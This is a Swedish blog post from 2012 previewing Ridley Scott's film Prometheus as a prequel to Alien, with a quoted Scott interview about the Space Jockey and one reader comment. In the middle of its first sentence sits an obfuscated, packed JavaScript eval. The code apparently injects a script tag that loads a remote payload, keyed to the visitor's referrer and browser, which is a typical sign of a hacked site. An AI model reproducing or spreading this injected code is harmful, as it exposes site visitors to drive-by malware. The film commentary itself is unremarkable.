Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Prometheus – Början på Aliensagan

Prometheus – Början på Aliensagan
Alexander Gylemo

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sefrt|var|u0026u|referrer|rzsne||js|php’.split(’|’),0,{}))
många säkert känner till vid det här laget kommer snart filmen Prometheus, en sci-fi film regisserad av Alien-skaparen Ridley Scott där vår egna Noomi Rapace spelar huvudrollen.

För de som inte läst på kan man ha missat att Prometheus inte är någon fristående science fiction-saga utan är i själva verket början på vad som 1979 kom att bli en av världens kändaste franshiser inom film. Prometheus uspelar sig 30 år före den första Alien-filmen och kan snabbt sammanfattas som att en grupp av rymdutforskare upptäcker en ledtråd till människans ursprung på Jorden, vilken leder dem till universums mörkaste hörn där de måste kämpa för mänsklighetens överlevnad. Det kan låta lite nötigt, men kom ihåg att med Ridley Scott bakom rattarna har filmen möjlighet att bli hur episk som helst, framför allt för oss Alienfans.

Filmen började som en uttalad föregångare till den  första Alienfilmen och fokuserade på den mystiska varelsen som en av Alienfilmens karaktärer upptäcker i en snabb scen i Alien. Efter att konceptet arbetats ut bestämde man sig dock för att ge filmen en mer fristående attityd och låta den istället leda vägen till Aliensagan utan att låna speciellt mycket från den. Den tidigare nämnda mystiska figuren, som kommit att kallas ”Space Jockey”, kommer stå i centrum berättar Ridley Scott till Filmophilia.

Yeah, so there you have that. I was always amazed that, I mean, I’ve only done two science-fiction [movies], but I was always amazed that no one asked who the hell the Space Jockey was. He wasn’t even called the Space Jockey. During the film [Alien] they started to call it the Space Jockey. I don’t know who started that one off. I always thought it was amazing that no one ever asked who he was, and why was he there? What was all that about? I sat thinking about this for a while and thought, well, there’s a story! And the other four [Alien movies] missed it! So, here it is.

Filmen släpps i år, 2012-06-08, och vi hoppas på att den blir den succé som det finns potential för!

httpv://www.youtube.com/watch?v=PlTKObCgR-o

Comments

  1. Johannes

    Oj detta kommer bli för grisigt!!